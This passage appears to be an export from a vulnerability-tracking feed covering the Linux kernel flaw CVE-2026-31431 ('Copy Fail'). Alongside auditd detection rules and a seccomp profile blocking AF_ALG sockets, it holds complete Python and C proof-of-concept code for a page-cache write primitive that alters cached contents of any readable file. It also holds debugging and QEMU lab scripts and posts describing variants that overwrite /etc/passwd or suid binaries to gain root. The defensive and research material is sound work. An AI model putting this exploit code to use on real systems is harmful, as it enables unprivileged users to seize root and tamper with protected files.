(family=38)\n# This is the primary indicator \u2014 AF_ALG has almost no legitimate use in containers\n-a always,exit -F arch=b64 -S socket -F a0=38 -k copyfail_af_alg\n\n# Rule 2: Detect splice syscall (secondary indicator, higher noise)\n# splice is used by nginx, sendfile, etc. \u2014 combine with Rule 1 for correlation\n-a always,exit -F arch=b64 -S splice -k copyfail_splice\n\n# Rule 3: Detect setsockopt on ALG sockets (additional context)\n# SOL_ALG=279, helps correlate with AF_ALG socket usage\n-a always,exit -F arch=b64 -S setsockopt -F a1=279 -k copyfail_algopt\n\n\n{\n  \"defaultAction\": \"SCMP_ACT_ALLOW\",\n  \"architectures\": [\"SCMP_ARCH_X86_64\", \"SCMP_ARCH_X86\", \"SCMP_ARCH_AARCH64\"],\n  \"syscalls\": [\n    {\n      \"names\": [\"socket\"],\n      \"action\": \"SCMP_ACT_ERRNO\",\n      \"errnoRet\": 1,\n      \"args\": [\n        {\n          \"index\": 0,\n          \"value\": 38,\n          \"valueTwo\": 0,\n          \"op\": \"SCMP_CMP_EQ\"\n        }\n      ],\n      \"comment\": \"Block AF_ALG (family=38) socket creation to prevent CVE-2026-31431\"\n    }\n  ]\n}\n\n\n#!/bin/bash\n# Test seccomp profile effectiveness against CVE-2026-31431\n#\n# Prerequisites:\n#   - Place block-af-alg.json in kubelet seccomp directory:\n#     Standard: /var/lib/kubelet/seccomp/block-af-alg.json\n#     k3s:      /var/lib/rancher/k3s/agent/seccomp/block-af-alg.json\n#   - Or for Docker: use --security-opt seccomp=block-af-alg.json\n#\n# Usage: ./test-seccomp.sh\n\nset -e\necho \"=== CVE-2026-31431 Seccomp Defense Verification ===\"\necho \"\"\n\n# Test 1: Default seccomp (should ALLOW AF_ALG)\necho \"[Test 1] Default seccomp profile (RuntimeDefault)...\"\ncat <<'EOF' | kubectl apply -f -\napiVersion: v1\nkind: Pod\nmetadata:\n  name: test-default-seccomp\n  namespace: copyfail-lab\nspec:\n  securityContext:\n    seccompProfile:\n      type: RuntimeDefault\n  containers:\n  - name: test\n    image: python:3.11-slim\n    command: [\"python3\", \"-c\", \"import socket; s=socket.socket(38,5,0); print('[!] AF_ALG socket created \u2014 DEFAULT SECCOMP DOES NOT BLOCK')\"]\n  restartPolicy: Never\nEOF\n\nsleep 5\nkubectl logs -n copyfail-lab test-default-seccomp 2>/dev/null || true\nkubectl delete pod -n copyfail-lab test-default-seccomp --force 2>/dev/null || true\necho \"\"\n\n# Test 2: Custom seccomp blocking AF_ALG (should DENY)\necho \"[Test 2] Custom seccomp profile (block-af-alg)...\"\ncat <<'EOF' | kubectl apply -f -\napiVersion: v1\nkind: Pod\nmetadata:\n  name: test-block-seccomp\n  namespace: copyfail-lab\nspec:\n  securityContext:\n    seccompProfile:\n      type: Localhost\n      localhostProfile: block-af-alg.json\n  containers:\n  - name: test\n    image: python:3.11-slim\n    command: [\"python3\", \"-c\", \"\nimport socket\ntry:\n    s = socket.socket(38, 5, 0)\n    print('[!] FAIL: AF_ALG socket created despite seccomp')\nexcept PermissionError as e:\n    print(f'[+] SUCCESS: AF_ALG blocked \u2014 {e}')\nexcept OSError as e:\n    print(f'[+] SUCCESS: AF_ALG blocked \u2014 {e}')\n# Verify TCP still works\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\nprint('[+] TCP socket OK \u2014 no side effects')\ns.close()\n\"]\n  restartPolicy: Never\nEOF\n\nsleep 5\nkubectl logs -n copyfail-lab test-block-seccomp 2>/dev/null || true\nkubectl delete pod -n copyfail-lab test-block-seccomp --force 2>/dev/null || true\necho \"\"\n\necho \"=== Docker equivalent ===\"\necho \"# Default (vulnerable):\"\necho \"docker run --rm python:3.11-slim python3 -c \\\"import socket; socket.socket(38,5,0); print('AF_ALG OK')\\\"\"\necho \"\"\necho \"# With custom seccomp (protected):\"\necho \"docker run --rm --security-opt seccomp=block-af-alg.json python:3.11-slim python3 -c \\\"import socket; socket.socket(38,5,0)\\\"\"\necho \"# Expected: PermissionError\"\n", "creation_timestamp": "2026-05-08T04:30:24.000000Z"}, {"uuid": "06cf5cb9-7290-42cc-9b80-6d03ac67933b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/0xlane/d89e230c9e18bfd8cc126452352afae6", "content": "#!/usr/bin/env python3\n\"\"\"\nCVE-2026-31431 \"Copy Fail\" \u2014 Page Cache Marker for Container Experiments\n=========================================================================\nWrites 0xDEADBEEF to the first 4 bytes of a target file's page cache.\nUsed to demonstrate cross-container page cache sharing via shared image layers.\n\nUsage:\n    python3 poc_marker.py \n    python3 poc_marker.py /bin/cat\n    python3 poc_marker.py /etc/os-release\n\nRequirements:\n    - Linux kernel vulnerable to CVE-2026-31431 (2017-07 to 2026-04)\n    - AF_ALG socket support (CONFIG_CRYPTO_USER_API_AEAD)\n    - authencesn algorithm available\n\nFor academic research only.\n\"\"\"\n\nimport os\nimport sys\nimport socket\nimport struct\n\nAF_ALG = 38\nSOL_ALG = 279\nALG_SET_KEY = 1\nALG_SET_IV = 2\nALG_SET_OP = 3\nALG_SET_AEAD_ASSOCLEN = 4\nALG_SET_AEAD_AUTHSIZE = 5\n\nAUTHSIZE = 4\nASSOCLEN = 8\nMSG_MORE = 0x8000\n\n\ndef page_cache_write_4bytes(target_fd, file_offset, value_bytes):\n    \"\"\"Write 4 bytes to target file's page cache at given offset.\"\"\"\n    alg_sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)\n    alg_sock.bind((\"aead\", \"authencesn(hmac(sha256),cbc(aes))\"))\n\n    # Key: rtattr(8) + authkey(16) + enckey(16) = 40 bytes\n    key = struct.pack('I', 16) + b'\\x00' * 32\n    alg_sock.setsockopt(SOL_ALG, ALG_SET_KEY, key)\n    alg_sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, AUTHSIZE)\n\n    req_sock, _ = alg_sock.accept()\n\n    # AAD: [0:4]=padding, [4:8]=value to write into page cache\n    aad = b'\\x00' * 4 + value_bytes\n    cmsg = [\n        (SOL_ALG, ALG_SET_OP, struct.pack(' [hex_value]\")\n        sys.exit(1)\n\n    target = sys.argv[1]\n    value = 0xDEADBEEF\n    if len(sys.argv) > 2:\n        value = int(sys.argv[2], 16)\n\n    fd = os.open(target, os.O_RDONLY)\n\n    # Read original bytes\n    original = os.pread(fd, 16, 0)\n    print(f\"[*] Target: {target}\")\n    print(f\"[*] Before: {original[:4].hex()}\")\n\n    # Write 4 bytes to page cache offset 0\n    page_cache_write_4bytes(fd, 0, struct.pack(' /proc/sys/vm/drop_caches\n\n---\napiVersion: v1\nkind: Pod\nmetadata:\n  name: hostpath-test\n  namespace: copyfail-lab\nspec:\n  containers:\n  - name: test\n    image: python:3.11-slim\n    command: [\"sleep\", \"infinity\"]\n  volumes:\n  - name: host-bin\n    hostPath:\n      path: /usr/bin\n      type: Directory\n  containers:\n  - name: test\n    image: python:3.11-slim\n    command: [\"sleep\", \"infinity\"]\n    volumeMounts:\n    - name: host-bin\n      mountPath: /hostbin\n      readOnly: true    # This does NOT prevent page cache corruption!\n", "creation_timestamp": "2026-05-08T04:30:22.000000Z"}, {"uuid": "1cd34b68-5a7f-4e06-8d35-708c486c4f53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/0xlane/0d565281d6a2ae05de2fc310a4a23a90", "content": "# GDB commands for CVE-2026-31431 dynamic debugging\n#\n# Usage: gdb ./vmlinux -x gdb_commands.gdb\n# Then:  target remote :1234\n#        continue\n\nset pagination off\nset confirm off\n\n# --- Breakpoint 1: crypto_authenc_esn_decrypt entry ---\nbreak crypto_authenc_esn_decrypt\ncommands\n    silent\n    printf \"\\n=== [BP1] crypto_authenc_esn_decrypt ===\\n\"\n    # req is first argument (rdi on x86_64)\n    printf \"  req->cryptlen  = %u\\n\", ((struct aead_request *)$rdi)->cryptlen\n    printf \"  req->assoclen  = %u\\n\", ((struct aead_request *)$rdi)->assoclen\n    printf \"  req->src       = %p\\n\", ((struct aead_request *)$rdi)->src\n    printf \"  req->dst       = %p\\n\", ((struct aead_request *)$rdi)->dst\n    printf \"  src == dst     = %d (in-place?)\\n\", ((struct aead_request *)$rdi)->src == ((struct aead_request *)$rdi)->dst\n    continue\nend\n\n# --- Breakpoint 2: scatterwalk_map_and_copy WRITE operations ---\n# out=1 means write. This catches the critical scratch write.\nbreak scatterwalk_map_and_copy if out == 1\ncommands\n    silent\n    printf \"\\n=== [BP2] scatterwalk_map_and_copy WRITE ===\\n\"\n    printf \"  buf=%p sg=%p start=%u nbytes=%u\\n\", buf, sg, start, nbytes\n    # Print first 4 bytes being written\n    printf \"  writing value: 0x%08x\\n\", *(unsigned int *)buf\n    continue\nend\n\n# --- Breakpoint 3: sg_chain call in algif_aead ---\n# This is where tag pages get chained to RX SGL\nbreak sg_chain\ncommands\n    silent\n    printf \"\\n=== [BP3] sg_chain ===\\n\"\n    printf \"  prv=%p prv_nents=%u sgl=%p\\n\", prv, prv_nents, sgl\n    continue\nend\n\nprintf \"\\n[GDB] Breakpoints set. Connect with: target remote :1234\\n\"\nprintf \"[GDB] Then: continue\\n\\n\"\n", "creation_timestamp": "2026-05-08T04:30:20.000000Z"}, {"uuid": "8aba6de0-b27b-464f-9094-38bb8c642086", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/0xlane/a854338363e449bdb002b43ff5080e55", "content": "#!/bin/sh\n# Minimal init for CVE-2026-31431 debugging\n\nmount -t proc proc /proc\nmount -t sysfs sysfs /sys\nmount -t devtmpfs devtmpfs /dev\nmkdir -p /dev/pts\nmount -t devpts devpts /dev/pts\nmount -t tmpfs tmpfs /tmp\n\n# Create a test target file for page cache experiments\necho \"ORIGINAL CONTENT - This is a test file for page cache write verification.\" > /tmp/target.txt\necho \"OFFSET_00 OFFSET_10 OFFSET_20 OFFSET_30 OFFSET_40 OFFSET_50 OFFSET_60\" >> /tmp/target.txt\n\n# Set hostname\nhostname copyfail-debug\n\necho \"\"\necho \"==========================================\"\necho \" CVE-2026-31431 Debug Environment\"\necho \"==========================================\"\necho \"\"\necho \"Available tools:\"\necho \"  /usr/bin/poc_pagecache_write   \"\necho \"\"\necho \"Quick test:\"\necho \"  hexdump -C /tmp/target.txt | head\"\necho \"  poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF\"\necho \"  hexdump -C /tmp/target.txt | head\"\necho \"  echo 3 > /proc/sys/vm/drop_caches\"\necho \"  hexdump -C /tmp/target.txt | head\"\necho \"\"\necho \"Kernel version: $(uname -r)\"\necho \"\"\n\n# Run experiment if script exists\nif [ -f /experiment_3_1.sh ]; then\n    sh /experiment_3_1.sh\nfi\n\nexec /bin/sh\n\n\n/*\n * CVE-2026-31431 \"Copy Fail\" \u2014 Minimal Page Cache Write PoC (C version)\n *\n * Demonstrates the page cache write primitive without full exploitation.\n * Writes a controlled 4-byte value to a target file's page cache.\n *\n * Usage: ./poc_pagecache_write   \n * Example: ./poc_pagecache_write /tmp/testfile 0 0xDEADBEEF\n *\n * For academic research only.\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef AF_ALG\n#define AF_ALG 38\n#endif\n#ifndef SOL_ALG\n#define SOL_ALG 279\n#endif\n#ifndef ALG_SET_KEY\n#define ALG_SET_KEY 1\n#endif\n#ifndef ALG_SET_IV\n#define ALG_SET_IV 2\n#endif\n#ifndef ALG_SET_OP\n#define ALG_SET_OP 3\n#endif\n#ifndef ALG_SET_AEAD_ASSOCLEN\n#define ALG_SET_AEAD_ASSOCLEN 4\n#endif\n#ifndef ALG_SET_AEAD_AUTHSIZE\n#define ALG_SET_AEAD_AUTHSIZE 5\n#endif\n\n#define AUTHSIZE  4\n#define ASSOCLEN  8\n#define AES_KEYLEN 16\n#define HMAC_KEYLEN 16\n#define IV_SIZE 16\n\nstruct authenc_key {\n    uint16_t rta_len;\n    uint16_t rta_type;\n    uint32_t enckeylen_be;\n    uint8_t  authkey[HMAC_KEYLEN];\n    uint8_t  enckey[AES_KEYLEN];\n} __attribute__((packed));\n\nstatic int page_cache_write_4bytes(int target_fd, unsigned int file_offset,\n                                   uint32_t value)\n{\n    int alg_fd, req_fd;\n    int pipefd[2];\n    struct sockaddr_alg sa;\n    struct authenc_key key;\n    int ret = -1;\n\n    memset(&sa, 0, sizeof(sa));\n    sa.salg_family = AF_ALG;\n    strcpy((char *)sa.salg_type, \"aead\");\n    strcpy((char *)sa.salg_name, \"authencesn(hmac(sha256),cbc(aes))\");\n\n    alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);\n    if (alg_fd < 0) {\n        perror(\"socket(AF_ALG)\");\n        return -1;\n    }\n\n    if (bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {\n        perror(\"bind\");\n        goto out_alg;\n    }\n\n    memset(&key, 0, sizeof(key));\n    key.rta_len = 8;\n    key.rta_type = 1;\n    key.enckeylen_be = htonl(AES_KEYLEN);\n\n    if (setsockopt(alg_fd, SOL_ALG, ALG_SET_KEY, &key, sizeof(key)) < 0) {\n        perror(\"setsockopt(ALG_SET_KEY)\");\n        goto out_alg;\n    }\n\n    if (setsockopt(alg_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, AUTHSIZE) < 0) {\n        perror(\"setsockopt(ALG_SET_AEAD_AUTHSIZE)\");\n        goto out_alg;\n    }\n\n    req_fd = accept(alg_fd, NULL, NULL);\n    if (req_fd < 0) {\n        perror(\"accept\");\n        goto out_alg;\n    }\n\n    /* sendmsg: AAD = \"AAAA\" + value (8 bytes total) */\n    {\n        uint8_t aad[ASSOCLEN];\n        memset(aad, 'A', 4);\n        memcpy(aad + 4, &value, 4);\n\n        uint32_t op = 0; /* ALG_OP_DECRYPT */\n        uint32_t assoclen = ASSOCLEN;\n        uint8_t iv_buf[sizeof(uint32_t) + IV_SIZE];\n        memset(iv_buf, 0, sizeof(iv_buf));\n        *(uint32_t *)iv_buf = IV_SIZE;\n\n        struct iovec iov = { .iov_base = aad, .iov_len = ASSOCLEN };\n\n        uint8_t cbuf[CMSG_SPACE(sizeof(op)) +\n                     CMSG_SPACE(sizeof(iv_buf)) +\n                     CMSG_SPACE(sizeof(assoclen))];\n        memset(cbuf, 0, sizeof(cbuf));\n\n        struct msghdr msg = {\n            .msg_iov = &iov,\n            .msg_iovlen = 1,\n            .msg_control = cbuf,\n            .msg_controllen = sizeof(cbuf),\n        };\n\n        struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);\n        cmsg->cmsg_level = SOL_ALG;\n        cmsg->cmsg_type = ALG_SET_OP;\n        cmsg->cmsg_len = CMSG_LEN(sizeof(op));\n        memcpy(CMSG_DATA(cmsg), &op, sizeof(op));\n\n        cmsg = CMSG_NXTHDR(&msg, cmsg);\n        cmsg->cmsg_level = SOL_ALG;\n        cmsg->cmsg_type = ALG_SET_IV;\n        cmsg->cmsg_len = CMSG_LEN(sizeof(iv_buf));\n        memcpy(CMSG_DATA(cmsg), iv_buf, sizeof(iv_buf));\n\n        cmsg = CMSG_NXTHDR(&msg, cmsg);\n        cmsg->cmsg_level = SOL_ALG;\n        cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;\n        cmsg->cmsg_len = CMSG_LEN(sizeof(assoclen));\n        memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));\n\n        if (sendmsg(req_fd, &msg, MSG_MORE) < 0) {\n            perror(\"sendmsg\");\n            goto out_req;\n        }\n    }\n\n    /* splice: file[0 : file_offset + AUTHSIZE] into AF_ALG socket */\n    {\n        size_t splice_len = file_offset + AUTHSIZE;\n\n        if (pipe(pipefd) < 0) {\n            perror(\"pipe\");\n            goto out_req;\n        }\n\n        loff_t off_in = 0;\n        ssize_t n = splice(target_fd, &off_in, pipefd[1], NULL,\n                           splice_len, SPLICE_F_MOVE);\n        if (n < 0 || (size_t)n != splice_len) {\n            perror(\"splice(file\u2192pipe)\");\n            goto out_pipe;\n        }\n\n        n = splice(pipefd[0], NULL, req_fd, NULL,\n                   splice_len, SPLICE_F_MOVE);\n        if (n < 0 || (size_t)n != splice_len) {\n            perror(\"splice(pipe\u2192socket)\");\n            goto out_pipe;\n        }\n    }\n\n    /* recv: triggers authencesn decrypt \u2192 page cache write happens here */\n    {\n        size_t recv_len = ASSOCLEN + file_offset;\n        uint8_t *buf = malloc(recv_len ? recv_len : 1);\n        if (!buf) goto out_pipe;\n\n        ssize_t n = recv(req_fd, buf, recv_len, 0);\n        /* Expected: n < 0, errno = EBADMSG (HMAC verification fails) */\n        /* But the 4-byte page cache write has already occurred! */\n        if (n < 0 && errno != EBADMSG)\n            fprintf(stderr, \"recv: unexpected error %d (%s)\\n\",\n                    errno, strerror(errno));\n        free(buf);\n    }\n\n    ret = 0;\n\nout_pipe:\n    close(pipefd[0]);\n    close(pipefd[1]);\nout_req:\n    close(req_fd);\nout_alg:\n    close(alg_fd);\n    return ret;\n}\n\nint main(int argc, char *argv[])\n{\n    if (argc != 4) {\n        fprintf(stderr, \"Usage: %s   \\n\", argv[0]);\n        fprintf(stderr, \"Example: %s /tmp/testfile 0 0xDEADBEEF\\n\", argv[0]);\n        return 1;\n    }\n\n    const char *target_path = argv[1];\n    unsigned int offset = strtoul(argv[2], NULL, 0);\n    uint32_t value = strtoul(argv[3], NULL, 0);\n\n    printf(\"[*] Target: %s\\n\", target_path);\n    printf(\"[*] Offset: %u (0x%x)\\n\", offset, offset);\n    printf(\"[*] Value:  0x%08x\\n\", value);\n\n    int fd = open(target_path, O_RDONLY);\n    if (fd < 0) {\n        perror(\"open target\");\n        return 1;\n    }\n\n    printf(\"[*] Writing 4 bytes to page cache...\\n\");\n    if (page_cache_write_4bytes(fd, offset, value) < 0) {\n        fprintf(stderr, \"[-] Page cache write failed\\n\");\n        close(fd);\n        return 1;\n    }\n\n    printf(\"[+] Done. Page cache of %s at offset %u should now contain 0x%08x\\n\",\n           target_path, offset, value);\n    printf(\"[*] Verify: hexdump -C -s %u -n 4 %s\\n\", offset, target_path);\n\n    close(fd);\n    return 0;\n}\n\n\n#!/bin/bash\n# Launch QEMU for CVE-2026-31431 debugging\n#\n# Usage:\n#   ./run_qemu.sh          # Normal boot\n#   ./run_qemu.sh debug    # Boot paused, waiting for GDB on :1234\n\nSCRIPT_DIR=\"$(cd \"$(dirname \"$0\")\" && pwd)\"\nBZIMAGE=\"${SCRIPT_DIR}/bzImage\"\nROOTFS=\"${SCRIPT_DIR}/rootfs.cpio.gz\"\n\nif [ ! -f \"$BZIMAGE\" ] || [ ! -f \"$ROOTFS\" ]; then\n    echo \"Error: bzImage or rootfs.cpio.gz not found in ${SCRIPT_DIR}\"\n    echo \"Run the Docker build first: ./build_docker.sh\"\n    exit 1\nfi\n\nEXTRA_ARGS=\"\"\nif [ \"$1\" = \"debug\" ]; then\n    EXTRA_ARGS=\"-s -S\"\n    echo \"=== Debug mode: QEMU paused, waiting for GDB on localhost:1234 ===\"\n    echo \"  In another terminal: gdb ./vmlinux -ex 'target remote :1234'\"\nfi\n\nexec qemu-system-x86_64 \\\n    -kernel \"$BZIMAGE\" \\\n    -initrd \"$ROOTFS\" \\\n    -append \"console=ttyS0 nokaslr\" \\\n    -nographic \\\n    -m 512M \\\n    -smp 1 \\\n    ${EXTRA_ARGS}\n", "creation_timestamp": "2026-05-08T04:30:19.000000Z"}, {"uuid": "0e067d22-0d08-4137-ac8c-b1a3527b8ab0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116538184098704690", "content": "variante peu sympa  \ud83d\udc40 \"Unprivileged Linux LPE via xfrm ESP-in-UDP MSG_SPLICE_PAGES no-COW fast path. Page-cache write into any readable file. Overwrites a nologin line in /etc/passwd with sick::0:0:...:/:/bin/bash and sus into it. Same class as Copy Fail (CVE-2026-31431), different subsystem.\"\u2b07\ufe0f https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo\n#CyberVeille #Linux", "creation_timestamp": "2026-05-08T09:12:49.508433Z"}, {"uuid": "df501d99-32d4-4a91-8432-899efa354b2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/ptescalator/718", "content": "Dirty Frag \ud83d\udc27\ud83d\udca5\n\n\u0421\u043f\u0443\u0441\u0442\u044f \u043d\u0435\u0434\u0435\u043b\u044e \u043f\u043e\u0441\u043b\u0435 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0435\u0433\u043e Copy.Fail \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c v4bel \u0440\u0430\u0441\u043a\u0440\u044b\u043b \u043d\u043e\u0432\u0443\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0443 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u044f\u0434\u0440\u0435 Linux \u2014 Dirty Frag.\n\n\u041f\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044e \u043d\u0430 8 \u043c\u0430\u044f \u0443 Dirty Frag \u043d\u0435\u0442 CVE-\u043d\u043e\u043c\u0435\u0440\u0430 \u0438, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e, \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0442 \u043c\u0435\u0439\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 \u044f\u0434\u0440\u0430 \u0442\u043e\u0436\u0435 \u043d\u0435\u0442. Dirty Frag \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u0442\u043e\u043c\u0443 \u0436\u0435 \u043a\u043b\u0430\u0441\u0441\u0443, \u0447\u0442\u043e Dirty Pipe \u0438 Copy.Fail, \u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0439 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c: \u0432\u043c\u0435\u0441\u0442\u043e pipe_buffer \u0430\u0442\u0430\u043a\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 sk_buff.\n\n\u041e\u0431\u0449\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043d\u0430\u0434\u0435\u0436\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0438\u0437\u043e\u0439 \u0432 PT Sandbox (Exploit.Linux.CVE-2022-0847.a, Exploit.Linux.CVE-2026-31431.a, Backdoor.Linux.Generic.a) \u2014 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u043d\u0430 \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0435.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442? \ud83e\uddd0\n\nDirty Frag \u2014 \u044d\u0442\u043e \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0438\u0437 \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u044f\u044e\u0442 \u0434\u0440\u0443\u0433 \u0434\u0440\u0443\u0433\u0430, \u0447\u0442\u043e\u0431\u044b \u043e\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0432\u0441\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b:\n\n1\ufe0f\u20e3 Page-Cache Write (\u0441 2017 \u0433\u043e\u0434\u0430): \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 4 \u0431\u0430\u0439\u0442 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446, \u043d\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432 \u0438\u043c\u0435\u043d, \u0447\u0442\u043e \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Ubuntu) \u043c\u043e\u0436\u0435\u0442 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f AppArmor.\n\n2\ufe0f\u20e3 RxRPC Page-Cache Write (\u0441 \u0438\u044e\u043d\u044f 2023 \u0433\u043e\u0434\u0430): \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043f\u0440\u0430\u0432 \u043d\u0430 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d, \u043d\u043e \u043c\u043e\u0434\u0443\u043b\u044c rxrpc.ko \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Ubuntu, \u0433\u0434\u0435 \u043e\u043d \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0432 \u0438\u0445, \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442:\n\n\u2022 \u041f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c suid-\u0444\u0430\u0439\u043b\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, /usr/bin/su) \u043d\u0430 \u0441\u0432\u043e\u044e \u0432\u0435\u0440\u0441\u0438\u044e\n\u2022 \u0418\u0437\u043c\u0435\u043d\u0438\u0442\u044c /etc/passwd, \u043e\u0447\u0438\u0441\u0442\u0438\u0432 \u043f\u0430\u0440\u043e\u043b\u044c root-\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\n\n\u041a\u0442\u043e \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439? \u26f3\ufe0f\n\n\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u044f\u0434\u0440\u043e\u043c Linux, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0441 2017 \u0433\u043e\u0434\u0430. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b \u0440\u0430\u0431\u043e\u0442\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445: Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44 \u0438 